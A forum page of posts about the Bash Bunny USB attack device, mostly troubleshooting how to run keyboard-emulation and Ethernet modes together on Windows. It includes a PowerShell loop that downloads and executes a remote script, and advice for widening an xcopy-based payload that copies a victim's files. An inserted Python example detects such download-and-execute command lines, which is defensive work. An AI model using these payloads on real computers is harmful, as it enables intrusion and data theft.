Posts posted by Seczilla

  1. 13 hours ago, unixnerd777 said:

    I guess I didn't look hard enough, I asked about this after you did:

    TLDR; use

    ATTACKMODE RNDIS_ETHERNET RNDIS_SPEED_10000

    Yes thanks. I figured it out by now. I asked the question before the firmware got released that included the feature.

  2. 7 hours ago, Decoy said:

    Yes, I apologise if that wasn't clear. 

    Yes sorry, I know that it does not make sense. It was just to show that changing it will remove the Ethernet device again and I cannot use the Ethernet connection in HID mode then (unless I have a loop that waits for the Ethernet connection to be available).

    I was not sure if this is an issue with just Windows 10 or if every version of Windows is affected. I think there are devices that work with RNDIS and HID at the same time in Windows 10, so it must be possible somehow. The question for me was just how it can be done. I have working code now, but I thought this is not the best way to do it as it creates delays, and officially the Bunny should be able to do that. Maybe someone else had it figured out, but it doesn't look like it.

    Thanks all for your comments.

  3. Thanks @Decoy. The Wiki was the first read I had.

    I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

    Take this example:

    LED R B
    #ATTACKMODE HID RNDIS_ETHERNET
    
    ATTACKMODE RNDIS_ETHERNET
    ATTACKMODE HID 
    LED G
    
    Q GUI
    Q DELAY 500
    Q STRING cmd.exe
    Q DELAY 100
    Q ENTER
    Q DELAY 500
    Q STRING ping -t 172.16.64.1
    Q ENTER

    At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

    At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

    Quote

    The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows' ability to recognize RNDIS as one.

    When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone, ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.

    So the only way I found that works on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.

  4. When using the following at the same time the BB is not recognized as an Ethernet adapter.

    ATTACKMODE RNDIS_ETHERNET HID

    I thought that this would be a feature of the BB to combine attack modes at the same time. I know I can do them after each other but that makes it just more complicated in some cases.

    I have seen in some examples that they use HID to create a loop in PowerShell to check for the connection with Test-Connection and after that switch the attack mode to RNDIS_ETHERNET.

    That just creates the following problem for me.

    C:\WINDOWS\system32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/test.ps1');exit}}"
    
    Test-Connection : Testing connection to computer '172.16.64.1' failed: Error due to lack of resources
    At line:1 char:20
    + while ($true) {If (Test-Connection 172.16.64.1 -count 1) { ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : ResourceUnavailable: (172.16.64.1:String) [Test-Connection], PingException
        + FullyQualifiedErrorId : TestConnectionException,Microsoft.PowerShell.Commands.TestConnectionCommand
    
    Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
    At line:1 char:77
    + ... IEX (New-Object Net.WebClient).DownloadString('http://172 ...
    +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : WebException

    Is there any update planned to fix the behavior in Windows so that we can actually use the attack modes at the same time?

    While I don't like the workaround mentioned above, it would work if I did not get the message "Unable to connect to the remote server". If I execute it manually a few seconds later it works just fine. Any ideas? Thank you in advance.
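A defender's view of the command line in the post above, as an added example that is not part of the original thread: it scores process-creation command lines (as captured by command-line auditing) for the three traits that loop combines. The sample events, indicator names and threshold are constructed assumptions; 172.16.64.1 is the address quoted in the post.

```python
import ipaddress
import re

# Constructed process-creation records (timestamp, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("10:01:02", "powershell \"while ($true) {If (Test-Connection 172.16.64.1 -count 1) "
                 "{IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/test.ps1');exit}}\""),
    ("10:05:40", "powershell -NoProfile -Command \"Test-Connection fileserver01 -Count 2\""),
    ("10:09:13", "powershell \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('https://example.com/install.ps1')\""),
    ("10:12:00", "cmd.exe /c ping -t 172.16.64.1"),
]

URL_HOST = re.compile(r"https?://([^/'\"\s:]+)", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I)
POLL = re.compile(r"while\s*\(\s*\$true\s*\).*test-connection", re.I | re.S)

def private_hosts(cmdline):
    """Return URL hosts that are IP literals in private (RFC 1918) or other non-public ranges."""
    hosts = []
    for host in URL_HOST.findall(cmdline):
        try:
            if ipaddress.ip_address(host).is_private:
                hosts.append(host)
        except ValueError:
            pass  # a DNS name, not an IP literal
    return hosts

def reasons(cmdline):
    """List the independent indicators present in one command line."""
    found = []
    if EXEC.search(cmdline) and FETCH.search(cmdline):
        found.append("download-and-execute")
    if private_hosts(cmdline):
        found.append("fetch-from-private-ip")
    if POLL.search(cmdline):
        found.append("poll-until-reachable")
    return found

def detect(events, threshold=2):
    """Flag events with at least `threshold` indicators; one alone is too noisy to alert on."""
    return [(ts, reasons(cmd)) for ts, cmd in events if len(reasons(cmd)) >= threshold]

if __name__ == "__main__":
    for ts, why in detect(SAMPLE_EVENTS):
        print(ts, ", ".join(why))
```

Only the first constructed event is flagged; the public-host download cradle and the plain ping each carry fewer than two indicators and stay below the threshold.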

    This might seem strange but I would like the BashBunny to be a slower network card. Is that possible? At the moment it presents itself as a 2 Gbit interface. The reason for this is that I don't want active VPN connections to drop because there is a new and faster interface.

    I hope this makes sense. Thanks for your advice.

  6. 5 minutes ago, peterkozmd said:

    Can there be a version that snags also images, address books, emails, bookmarks, passwords, etc. an AIO (all-in-one) that takes anything remotely interesting =)

    You can adapt it really easily.

    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul

    Just change the *.pdf in line 22 of the e.cmd file to whatever you want.
